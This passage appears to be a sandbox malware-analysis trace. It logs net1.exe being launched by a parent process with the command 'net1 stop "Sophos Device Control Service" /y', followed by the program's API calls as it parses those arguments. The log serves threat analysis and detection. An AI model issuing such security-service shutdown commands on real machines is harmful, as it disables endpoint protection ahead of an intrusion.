AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 87 os_tid = 0xb48 Process: id = "20" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x486a7000" os_pid = "0xb4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0xb44" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Device Control ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 88 os_tid = 0xb50 [0037.483] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x29fd70 | out: lpSystemTimeAsFileTime=0x29fd70*(dwLowDateTime=0xe08b46c0, dwHighDateTime=0x1d57a86)) [0037.483] GetCurrentProcessId () returned 0xb4c [0037.483] GetCurrentThreadId () returned 0xb50 [0037.483] GetTickCount () returned 0x1144625 [0037.483] QueryPerformanceCounter (in: lpPerformanceCount=0x29fd68 | out: lpPerformanceCount=0x29fd68*=15776801810) returned 1 [0037.484] GetModuleHandleA (lpModuleName=0x0) returned 0xec0000 [0037.484] __set_app_type (_Type=0x1) [0037.484] __p__fmode () returned 0x74eb31f4 [0037.484] __p__commode () returned 0x74eb31fc [0037.484] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xecffe6) returned 0x0 [0037.484] __getmainargs (in: _Argc=0xed9064, _Argv=0xed906c, _Env=0xed9068, _DoWildCard=0, _StartInfo=0xed9024 | out: _Argc=0xed9064, _Argv=0xed906c, _Env=0xed9068) returned 0 [0037.484] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0037.484] GetConsoleOutputCP () returned 0x1b5 [0037.484] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xed9080 | out: lpCPInfo=0xed9080) returned 1 [0037.484] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.488] sprintf_s (in: _DstBuf=0x29fd28, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0037.488] setlocale (category=0, locale=".437") returned="English_United States.437" [0037.490] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0037.490] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0037.490] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Device Control ServiceΓÇ¥ /y" [0037.490] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x29faf4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0037.490] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xa6) returned 0x5b3c58 [0037.490] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0037.490] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29fcf8 | out: Buffer=0x29fcf8*=0x5b1cb8) returned 0x0 [0037.490] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29fcf8 | out: Buffer=0x29fcf8*=0x5b1cd0) returned 0x0 [0037.490] _fileno (_File=0x74eb2900) returned -2 [0037.490] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0037.490] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0037.490] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0037.491] _wcsicmp (_String1="config", _String2="stop") returned -16 [0037.491] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0037.491] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0037.491] _wcsicmp (_String1="file", _String2="stop") returned -13 [0037.491] _wcsicmp (_String1="files", _String2="stop") returned -13 [0037.491] _wcsicmp (_String1="group", _String2="stop") returned -12 [0037.491] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0037.491] _wcsicmp (_String1="help", _String2="stop") returned -11 [0037.491] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0037.491] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0037.491] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0037.491] _wcsicmp (_String1="session", _String2="stop") returned -15 [0037.491] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0037.491] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0037.491] _wcsicmp (_String1="share", _String2="stop") returned -12 [0037.491] _wcsicmp (_String1="start", _String2="stop") returned -14 [0037.491] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0037.491] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0037.491] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0037.491] _wcsicmp (_String1="accounts", _String2="ΓÇ£Sophos") returned -850 [0037.491] _wcsicmp (_String1="computer", _String2="ΓÇ£Sophos") returned -848 [0037.491] _wcsicmp (_String1="config", _String2="ΓÇ£Sophos") returned -848 [0037.491] _wcsicmp (_String1="continue", _String2="ΓÇ£Sophos") returned -848 [0037.491] _wcsicmp (_String1="cont", _String2="ΓÇ£Sophos") returned -848 [0037.491] _wcsicmp (_String1="file", _String2="ΓÇ£Sophos") returned -845 [0037.491] _wcsicmp (_String1="files", _String2="ΓÇ£Sophos") returned -845 [0037.491] _wcsicmp (_String1="group", _String2="ΓÇ£Sophos") returned -844 [0037.491] _wcsicmp (_String1="groups", _String2="ΓÇ£Sophos") returned -844 [0037.491] _wcsicmp (_String1="help", _String2="ΓÇ£Sophos") returned -843 [0037.491] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£Sophos") returned -843 [0037.491] _wcsicmp (_String1="localgroup", _String2="ΓÇ£Sophos") returned -839 [0037.491] _wcsicmp (_String1="pause", _String2="ΓÇ£Sophos") returned -835 [0037.491] _wcsicmp (_String1="session", _String2="ΓÇ£Sophos") returned -832 [0037.491] _wcsicmp (_String1="sessions", _String2="ΓÇ£Sophos") returned -832 [0037.492] _wcsicmp (_String1="sess", _String2="ΓÇ£Sophos") returned -832 [0037.492] _wcsicmp (_String1="share", _String2="ΓÇ£Sophos") returned -832 [0037.492] _wcsicmp (_String1="start", _String2="ΓÇ£Sophos") returned -832 [0037.492] _wcsicmp (_String1="stats", _String2="ΓÇ£Sophos") returned -832 [0037.492] _wcsicmp (_String1="statistics", _String2="ΓÇ£Sophos") returned -832 [0037.492] _wcsicmp (_String1="stop", _String2="ΓÇ£Sophos") returned -832 [0037.492] _wcsicmp (_String1="time", _String2="ΓÇ£Sophos") returned -831 [0037.492] _wcsicmp (_String1="user", _String2="ΓÇ£Sophos") returned -830 [0037.492] _wcsicmp (_String1="users", _String2="ΓÇ£Sophos") returned -830 [0037.492] _wcsicmp (_String1="msg", _String2="ΓÇ£Sophos") returned -838 [0037.492] _wcsicmp (_String1="messenger", _String2="ΓÇ£Sophos") returned -838 [0037.492] _wcsicmp (_String1="receiver", _String2="ΓÇ£Sophos") returned -833 [0037.492] _wcsicmp (_String1="rcv", _String2="ΓÇ£Sophos") returned -833 [0037.492] _wcsicmp (_String1="netpopup", _String2="ΓÇ£Sophos") returned -837 [0037.492] _wcsicmp (_String1="redirector", _String2="ΓÇ£Sophos") returned -833 [0037.492] _wcsicmp (_String1="redir", _String2="ΓÇ£Sophos") returned -833 [0037.492] _wcsicmp (_String1="rdr", _String2="ΓÇ£Sophos") returned -833 [0037.492] _wcsicmp (_String1="workstation", _String2="ΓÇ£Sophos") returned -828 [0037.492] _wcsicmp (_String1="work", _String2="ΓÇ£Sophos") returned -828 [0037.492] _wcsicmp (_String1="wksta", _String2="ΓÇ£Sophos") returned -828 [0037.492] _wcsicmp (_String1="prdr", _String2="ΓÇ£Sophos") returned -835 [0037.492] _wcsicmp (_String1="devrdr", _String2="ΓÇ£Sophos") returned -847 [0037.492] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£Sophos") returned -839 [0037.492] _wcsicmp (_String1="server", _String2="ΓÇ£Sophos") returned -832 [0037.492] _wcsicmp (_String1="svr", _String2="ΓÇ£Sophos") returned -832 [0037.492] _wcsicmp (_String1="srv", _String2="ΓÇ£Sophos") returned -832 [0037.492] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£Sophos") returned -839 [0037.492] _wcsicmp (_String1="alerter", _String2="ΓÇ£Sophos") returned -850 [0037.492] _wcsicmp (_String1="netlogon", _String2="ΓÇ£Sophos") returned -837 [0037.492] _wcsicmp (_String1="accounts", _String2="Device") returned -3 [0037.492] _wcsicmp (_String1="computer", _String2="Device") returned -1 [0037.492] _wcsicmp (_String1="config", _String2="Device") returned -1 [0037.493] _wcsicmp (_String1="continue", _String2="Device") returned -1 [0037.493] _wcsicmp (_String1="cont", _String2="Device") returned -1 [0037.493] _wcsicmp (_String1="file", _String2="Device") returned 2 [0037.493] _wcsicmp (_String1="files", _String2="Device") returned 2 [0037.493] _wcsicmp (_String1="group", _String2="Device") returned 3 [0037.493] _wcsicmp (_String1="groups", _String2="Device") returned 3 [0037.493] _wcsicmp (_String1="help", _String2="Device") returned 4 [0037.493] _wcsicmp (_String1="helpmsg", _String2="Device") returned 4 [0037.493] _wcsicmp (_String1="localgroup", _String2="Device") returned 8 [0037.493] _wcsicmp (_String1="pause", _String2="Device") returned 12 [0037.493] _wcsicmp (_String1="session", _String2="Device") returned 15 [0037.493] _wcsicmp (_String1="sessions", _String2="Device") returned 15 [0037.493] _wcsicmp (_String1="sess", _String2="Device") returned 15 [0037.493] _wcsicmp (_String1="share", _String2="Device") returned 15 [0037.493] _wcsicmp (_String1="start", _String2="Device") returned 15 [0037.493] _wcsicmp (_String1="stats", _String2="Device") returned 15 [0037.493] _wcsicmp (_String1="statistics", _String2="Device") returned 15 [0037.493] _wcsicmp (_String1="stop", _String2="Device") returned 15 [0037.493] _wcsicmp (_String1="time", _String2="Device") returned 16 [0037.493] _wcsicmp (_String1="user", _String2="Device") returned 17 [0037.493] _wcsicmp (_String1="users", _String2="Device") returned 17 [0037.493] _wcsicmp (_String1="msg", _String2="Device") returned 9 [0037.493] _wcsicmp (_String1="messenger", _String2="Device") returned 9 [0037.493] _wcsicmp (_String1="receiver", _String2="Device") returned 14 [0037.493] _wcsicmp (_String1="rcv", _String2="Device") returned 14 [0037.493] _wcsicmp (_String1="netpopup", _String2="Device") returned 10 [0037.493] _wcsicmp (_String1="redirector", _String2="Device") returned 14 [0037.493] _wcsicmp (_String1="redir", _String2="Device") returned 14 [0037.493] _wcsicmp (_String1="rdr", _String2="Device") returned 14 [0037.493] _wcsicmp (_String1="workstation", _String2="Device") returned 19 [0037.493] _wcsicmp (_String1="work", _String2="Device") returned 19 [0037.493] _wcsicmp (_String1="wksta", _String2="Device") returned 19 [0037.493] _wcsicmp (_String1="prdr", _String2="Device") returned 12 [0037.493] _wcsicmp (_String1="devrdr", _String2="Device") returned 9 [0037.493] _wcsicmp (_String1="lanmanworkstation", _String2="Device") returned 8 [0037.493] _wcsicmp (_String1="server", _String2="Device") returned 15 [0037.493] _wcsicmp (_String1="svr", _String2="Device") returned 15 [0037.493] _wcsicmp (_String1="srv", _String2="Device") returned 15 [0037.494] _wcsicmp (_String1="lanmanserver", _String2="Device") returned 8 [0037.494] _wcsicmp (_String1="alerter", _String2="Device") returned -3 [0037.494] _wcsicmp (_String1="netlogon", _String2="Device") returned 10 [0037.494] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0037.494] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.494] wcscpy_s (in: _Destination=0x29f7f8, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0037.494] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74770000 [0037.497] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x29f7f4, nSize=0x0, Arguments=0x29f7f0 | out: lpBuffer="噸[neth.dll") returned 0xff [0037.502] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0037.502] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0037.502] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0037.502] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0037.502] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0037.502] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0037.502] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0037.502] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0037.502] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0037.502] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0037.502] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.502] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0037.502] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0037.502] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0037.502] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0037.502] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0037.502] _wcsicmp (_String1="CONT", _String2="ΓÇ£Sophos") returned -848 [0037.502] _wcsicmp (_String1="CONT", _String2="Device") returned -1 [0037.502] _wcsicmp (_String1="CONT", _String2="Control") returned -114 [0037.502] _wcsicmp (_String1="CONT", _String2="ServiceΓÇ¥") returned -16 [0037.502] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.502] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0037.502] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.502] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0037.503] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0037.503] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0037.503] _wcsicmp (_String1="FILES", _String2="ΓÇ£Sophos") returned -845 [0037.503] _wcsicmp (_String1="FILES", _String2="Device") returned 2 [0037.503] _wcsicmp (_String1="FILES", _String2="Control") returned 3 [0037.503] _wcsicmp (_String1="FILES", _String2="ServiceΓÇ¥") returned -13 [0037.503] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.503] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0037.503] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.503] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0037.503] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0037.503] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0037.503] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£Sophos") returned -844 [0037.503] _wcsicmp (_String1="GROUPS", _String2="Device") returned 3 [0037.503] _wcsicmp (_String1="GROUPS", _String2="Control") returned 4 [0037.503] _wcsicmp (_String1="GROUPS", _String2="ServiceΓÇ¥") returned -12 [0037.503] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.503] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0037.503] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.503] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0037.503] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.503] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0037.503] _wcsicmp (_String1="REPL", _String2="ΓÇ£Sophos") returned -833 [0037.503] _wcsicmp (_String1="REPL", _String2="Device") returned 14 [0037.503] _wcsicmp (_String1="REPL", _String2="Control") returned 15 [0037.503] _wcsicmp (_String1="REPL", _String2="ServiceΓÇ¥") returned -1 [0037.503] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0037.503] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.503] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0037.503] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£Sophos") returned -833 [0037.503] _wcsicmp (_String1="REPLICATOR", _String2="Device") returned 14 [0037.503] _wcsicmp (_String1="REPLICATOR", _String2="Control") returned 15 [0037.503] _wcsicmp (_String1="REPLICATOR", _String2="ServiceΓÇ¥") returned -1 [0037.503] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.503] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0037.503] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.504] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0037.504] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0037.504] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0037.504] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£Sophos") returned -832 [0037.504] _wcsicmp (_String1="SESSIONS", _String2="Device") returned 15 [0037.504] _wcsicmp (_String1="SESSIONS", _String2="Control") returned 16 [0037.504] _wcsicmp (_String1="SESSIONS", _String2="ServiceΓÇ¥") returned 1 [0037.504] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0037.504] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.504] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0037.504] _wcsicmp (_String1="SESS", _String2="ΓÇ£Sophos") returned -832 [0037.504] _wcsicmp (_String1="SESS", _String2="Device") returned 15 [0037.504] _wcsicmp (_String1="SESS", _String2="Control") returned 16 [0037.504] _wcsicmp (_String1="SESS", _String2="ServiceΓÇ¥") returned 1 [0037.504] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.504] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0037.504] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.504] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0037.504] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0037.504] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0037.504] _wcsicmp (_String1="STATS", _String2="ΓÇ£Sophos") returned -832 [0037.504] _wcsicmp (_String1="STATS", _String2="Device") returned 15 [0037.504] _wcsicmp (_String1="STATS", _String2="Control") returned 16 [0037.504] _wcsicmp (_String1="STATS", _String2="ServiceΓÇ¥") returned 15 [0037.504] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.504] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0037.504] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.504] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0037.504] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0037.504] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0037.504] _wcsicmp (_String1="USERS", _String2="ΓÇ£Sophos") returned -830 [0037.504] _wcsicmp (_String1="USERS", _String2="Device") returned 17 [0037.504] _wcsicmp (_String1="USERS", _String2="Control") returned 18 [0037.504] _wcsicmp (_String1="USERS", _String2="ServiceΓÇ¥") returned 2 [0037.504] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.504] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0037.505] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.505] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0037.505] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0037.505] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0037.505] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£Sophos") returned -833 [0037.505] _wcsicmp (_String1="REDIRECTOR", _String2="Device") returned 14 [0037.505] _wcsicmp (_String1="REDIRECTOR", _String2="Control") returned 15 [0037.505] _wcsicmp (_String1="REDIRECTOR", _String2="ServiceΓÇ¥") returned -1 [0037.505] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0037.505] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.505] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0037.505] _wcsicmp (_String1="REDIR", _String2="ΓÇ£Sophos") returned -833 [0037.505] _wcsicmp (_String1="REDIR", _String2="Device") returned 14 [0037.505] _wcsicmp (_String1="REDIR", _String2="Control") returned 15 [0037.505] _wcsicmp (_String1="REDIR", _String2="ServiceΓÇ¥") returned -1 [0037.505] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0037.505] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.505] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0037.505] _wcsicmp (_String1="RDR", _String2="ΓÇ£Sophos") returned -833 [0037.505] _wcsicmp (_String1="RDR", _String2="Device") returned 14 [0037.505] _wcsicmp (_String1="RDR", _String2="Control") returned 15 [0037.505] _wcsicmp (_String1="RDR", _String2="ServiceΓÇ¥") returned -1 [0037.505] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0037.505] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.505] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0037.505] _wcsicmp (_String1="WORK", _String2="ΓÇ£Sophos") returned -828 [0037.505] _wcsicmp (_String1="WORK", _String2="Device") returned 19 [0037.505] _wcsicmp (_String1="WORK", _String2="Control") returned 20 [0037.505] _wcsicmp (_String1="WORK", _String2="ServiceΓÇ¥") returned 4 [0037.505] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0037.505] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.505] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0037.505] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£Sophos") returned -828 [0037.505] _wcsicmp (_String1="WKSTA", _String2="Device") returned 19 [0037.505] _wcsicmp (_String1="WKSTA", _String2="Control") returned 20 [0037.506] _wcsicmp (_String1="WKSTA", _String2="ServiceΓÇ¥") returned 4 [0037.506] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0037.506] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.506] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0037.506] _wcsicmp (_String1="PRDR", _String2="ΓÇ£Sophos") returned -835 [0037.506] _wcsicmp (_String1="PRDR", _String2="Device") returned 12 [0037.506] _wcsicmp (_String1="PRDR", _String2="Control") returned 13 [0037.506] _wcsicmp (_String1="PRDR", _String2="ServiceΓÇ¥") returned -3 [0037.506] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0037.506] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0037.506] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0037.506] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£Sophos") returned -847 [0037.506] _wcsicmp (_String1="DEVRDR", _String2="Device") returned 9 [0037.506] _wcsicmp (_String1="DEVRDR", _String2="Control") returned 1 [0037.506] _wcsicmp (_String1="DEVRDR", _String2="ServiceΓÇ¥") returned -15 [0037.506] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.506] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0037.506] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.506] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0037.506] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0037.506] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0037.506] _wcsicmp (_String1="SVR", _String2="ΓÇ£Sophos") returned -832 [0037.506] _wcsicmp (_String1="SVR", _String2="Device") returned 15 [0037.506] _wcsicmp (_String1="SVR", _String2="Control") returned 16 [0037.506] _wcsicmp (_String1="SVR", _String2="ServiceΓÇ¥") returned 17 [0037.506] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0037.506] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.506] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0037.506] _wcsicmp (_String1="SRV", _String2="ΓÇ£Sophos") returned -832 [0037.506] _wcsicmp (_String1="SRV", _String2="Device") returned 15 [0037.506] _wcsicmp (_String1="SRV", _String2="Control") returned 16 [0037.506] _wcsicmp (_String1="SRV", _String2="ServiceΓÇ¥") returned 13 [0037.506] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 